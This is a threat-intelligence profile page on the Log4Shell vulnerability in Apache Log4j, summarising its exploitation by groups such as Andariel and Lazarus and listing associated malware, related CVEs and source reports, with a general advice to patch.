Log4Shell

Vulnerability updated a day ago (2024-11-20T17:39:28.516Z)

Download STIX

Preview STIX

Log4Shell is a significant software vulnerability (CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105) that exists in the Log4j Java-based logging utility. It was exploited by various Advanced Persistent Threat (APT) actors, including LockBit affiliates and GOLD MELODY (UNC961), to gain unauthorized access to victims' systems. The exploitation of this flaw allows malicious actors to execute arbitrary code on the targeted systems, leading to potential data breaches or system disruptions. Notably, the Log4Shell vulnerability was leveraged for initial access to organizations' VMware Horizon servers and MobileIron Core servers. The exploitation of Log4Shell became particularly prominent around December 15, 2021, when StealthLoader malware began leveraging it. This event highlighted the persistent risk associated with the vulnerability, which was exacerbated by infrequent remediation efforts. In fact, despite the widespread knowledge and publicity surrounding the vulnerability, as many as 13% of Log4j downloads remained vulnerable three years after the initial exposure of Log4Shell, demonstrating the persistence of this security issue. To mitigate the risks associated with Log4Shell and other Log4j-related vulnerabilities, cybersecurity advisories have been issued, such as joint CSA: Mitigating Log4Shell and Other Log4j-Related Vulnerabilities. Despite these efforts, malicious cyber actors continue to exploit Log4Shell, especially in unpatched VMware Horizon systems. Thus, organizations are strongly advised to promptly apply patches and follow best practices to protect their systems against this ongoing threat.

Description last updated: 2024-11-15T15:57:18.747Z

What's your take? (Question 1 of 5)

Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.

Possible Aliases / Cluster overlaps

It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at. Create a free account to see the source evidence for each alias, and help fix any errors.

Alias Description	Votes
CVE-2021-44228 is a possible alias for Log4Shell. CVE-2021-44228, also known as the Log4Shell vulnerability, is a significant flaw in Apache's Log4j software. Disclosed in December 2021, it quickly became one of the most severe bugs due to its widespread usage and potential for exploitation. Various Advanced Persistent Threat (APT) actors attempted	11

Miscellaneous Associations

Other elements of context that could aid in the identification of relevance

Vulnerability

Log4j

Exploit

Apache

exploitation

Remote Code ...

Exploits

Ransomware

Malware

Confluence

exploited

Source

flaw

Operation Bl...

Cisco

RCE (Remote ...

Moveit

Lateral Move...

Manageengine

Botnet

Apt

Ofbiz

Chrome

Secureworks

Linux

Phishing

bugs

Implant

Reconnaissance

Payload

Iran

Zero Day

Apache Struts

Analyst Notes & Discussion

Be the first to leave your mark here! Log in to share your views and vote.

Associated Malware

To see the evidence that has resulted in these malware associations, create a free account

Alias Description	Association Type	Votes
The Earlyrat Malware is associated with Log4Shell. EarlyRat is a previously undocumented malware discovered by Kaspersky researchers in June. The North Korea-linked Advanced Persistent Threat (APT) group Andariel used EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year. The malware was first noticed in one of the Log4j cases,	Unspecified	2
The Kinsing Malware is associated with Log4Shell. Kinsing is a malicious software, or malware, that has been recently observed exploiting vulnerabilities in systems. It operates by infiltrating computers or devices, often undetected, through suspicious downloads, emails, or websites. Once inside, Kinsing can wreak havoc by stealing personal informa	Unspecified	2
The Conti Malware is associated with Log4Shell. Conti is a type of malware, specifically ransomware, that infiltrates systems to exploit and damage them. Often spreading through suspicious downloads, emails, or websites, it can steal personal information, disrupt operations, or hold data hostage for ransom. Notably, Conti was linked to several ra	has used	2

Associated Threat Actors

To see the evidence that has resulted in these threatActor associations, create a free account

Alias Description	Association Type	Votes
The Andariel Threat Actor is associated with Log4Shell. Andariel, a threat actor controlled by North Korea's military intelligence agency, the Reconnaissance General Bureau, has been actively conducting cyber espionage and ransomware operations. The group funds its activities through ransomware attacks primarily targeting U.S. healthcare entities. In som	Unspecified	4
The Lazarus Group Threat Actor is associated with Log4Shell. The Lazarus Group, a notorious North Korean state-sponsored threat actor, is among the most prolific and dangerous cyber threat actors in operation. The group has been involved in several high-profile cyber-attacks, including Operation DreamJob in Spain, with the primary objective of funding North K	Unspecified	4

Associated Vulnerabilities

To see the evidence that has resulted in these vulnerability associations, create a free account

Alias Description	Association Type	Votes
The Proxyshell Vulnerability is associated with Log4Shell. ProxyShell is a vulnerability that affects Microsoft Exchange email servers, posing a significant risk to organizations worldwide. This flaw in software design or implementation allows attackers to exploit the system and gain unauthorized access. Since early 2021, Iranian government-sponsored APT ac	Unspecified	5
The Follina Vulnerability is associated with Log4Shell. Follina (CVE-2022-30190) is a software vulnerability that was discovered and exploited in the first half of 2022. It was weaponized by TA413, a malicious entity known for its cyber attacks, shortly after its discovery and publication. The vulnerability was used to target the Sophos Firewall product,	Unspecified	3
The CVE-2022-30190 Vulnerability is associated with Log4Shell. CVE-2022-30190, also known as the "Follina" vulnerability, is a high-risk software flaw in the Microsoft Support Diagnostic Tool that allows for remote code execution. This 0-day vulnerability was disclosed in May 2022 and has since been exploited by threat actors, including TA413, who weaponized it	Unspecified	3
The vulnerability CVE-2021-45046 is associated with Log4Shell.	is / was	2
The vulnerability CVE-2021-34523 is associated with Log4Shell.	Unspecified	2
The CVE-2021-26084 Vulnerability is associated with Log4Shell. CVE-2021-26084 is a critical vulnerability related to Atlassian's Confluence software. The flaw in the software design or implementation was first exploited as a zero-day, before its public disclosure in June 2022. It allowed remote attackers to execute code on a Confluence Server via injection atta	Unspecified	2
The CVE-2022-22954 Vulnerability is associated with Log4Shell. CVE-2022-22954 is a significant software vulnerability that affects VMware's Workspace One Access and Identity Manager. This flaw in the software design or implementation allows for remote code execution, providing an attacker with the ability to execute arbitrary commands on the affected system. Ov	Unspecified	2
The CVE-2022-1388 Vulnerability is associated with Log4Shell. CVE-2022-1388 is a significant software vulnerability identified in the F5 BIG-IP system, specifically in the iControl REST interface. This flaw allows unauthorized bypass of the authentication process, providing potential attackers with unauthorized access to the system. Initial access is typically	Unspecified	2
The CVE-2022-26134 Vulnerability is associated with Log4Shell. CVE-2022-26134 is a critical software vulnerability that was discovered in Atlassian Confluence Server and Data Center. This flaw, which allows for remote code execution (RCE), was publicly disclosed by Atlassian in June 2022. The Cybersecurity and Infrastructure Security Agency (CISA) recognized th	Unspecified	2
The CVE-2021-34473 Vulnerability is associated with Log4Shell. CVE-2021-34473 is a significant software vulnerability that was discovered in Microsoft Exchange Server. This flaw, along with two others (CVE-2021-31207 and CVE-2021-34523), forms a chain of vulnerabilities known as ProxyShell. These vulnerabilities can be exploited together by remote attackers to	Unspecified	2
The CVE-2018-13379 Vulnerability is associated with Log4Shell. CVE-2018-13379 is a critical vulnerability that affects FortiOS and Fortiguard, presenting a flaw in their software design or implementation. This specific vulnerability, which can expose sensitive credentials, has been frequently exploited, making the top 15 most routinely exploited list in both 20	Unspecified	2
The CVE-2021-31207 Vulnerability is associated with Log4Shell. CVE-2021-31207 is a significant software vulnerability that has been exploited by APT40, a group known for rapidly taking advantage of newly public vulnerabilities in widely used software. This particular vulnerability affects Atlassian Confluence and Microsoft Exchange, among other platforms, and a	Unspecified	2
The vulnerability CVE-2021-40539 is associated with Log4Shell.	Unspecified	2
The vulnerability CVE-2022-22960 is associated with Log4Shell.	Unspecified	2
The CVE-2017-5638 Vulnerability is associated with Log4Shell. CVE-2017-5638 is a significant vulnerability found in Apache Struts, a widely used open-source framework for developing Java web applications. This flaw in software design or implementation allowed attackers to remotely execute commands on the server running the vulnerable application, leading to po	Unspecified	2

Source Document References

Information about the Log4Shell Vulnerability was read from the documents corpus below. This display is limited to 20 results, create a free account to see more

Source Link	CreatedAt	Title
Checkpoint	10 hours ago	18th November – Threat Intelligence Report
CISA	6 days ago	2023 Top Routinely Exploited Vulnerabilities \| CISA
Checkpoint	10 days ago	11th November – Threat Intelligence Report - Check Point Research
Checkpoint	17 days ago	4th November – Threat Intelligence Report - Check Point Research
BankInfoSecurity	21 days ago	Breach Roundup: S&P Says Poor Remediation A Material Risk
Checkpoint	23 days ago	28th October – Threat Intelligence Report - Check Point Research
Checkpoint	a month ago	21st October – Threat Intelligence Report - Check Point Research
Checkpoint	a month ago	14th October – Threat Intelligence Report - Check Point Research
InfoSecurity-magazine	a month ago	Sonatype Reports 156% Increase in OSS Malicious Packages
Checkpoint	a month ago	7th October– Threat Intelligence Report - Check Point Research
Checkpoint	2 months ago	30th September – Threat Intelligence Report - Check Point Research
BankInfoSecurity	2 months ago	Linux Distros Patching Printer Hijacking Flaw
Checkpoint	2 months ago	23rd September – Threat Intelligence Report - Check Point Research
Checkpoint	2 months ago	16th September – Threat Intelligence Report - Check Point Research
Checkpoint	2 months ago	9th September – Threat Intelligence Report - Check Point Research
Checkpoint	3 months ago	2nd September – Threat Intelligence Report - Check Point Research
Checkpoint	3 months ago	26th August – Threat Intelligence Report - Check Point Research
Checkpoint	3 months ago	19th August – Threat Intelligence Report - Check Point Research
Checkpoint	3 months ago	12th August – Threat Intelligence Report - Check Point Research
Checkpoint	4 months ago	5th August – Threat Intelligence Report - Check Point Research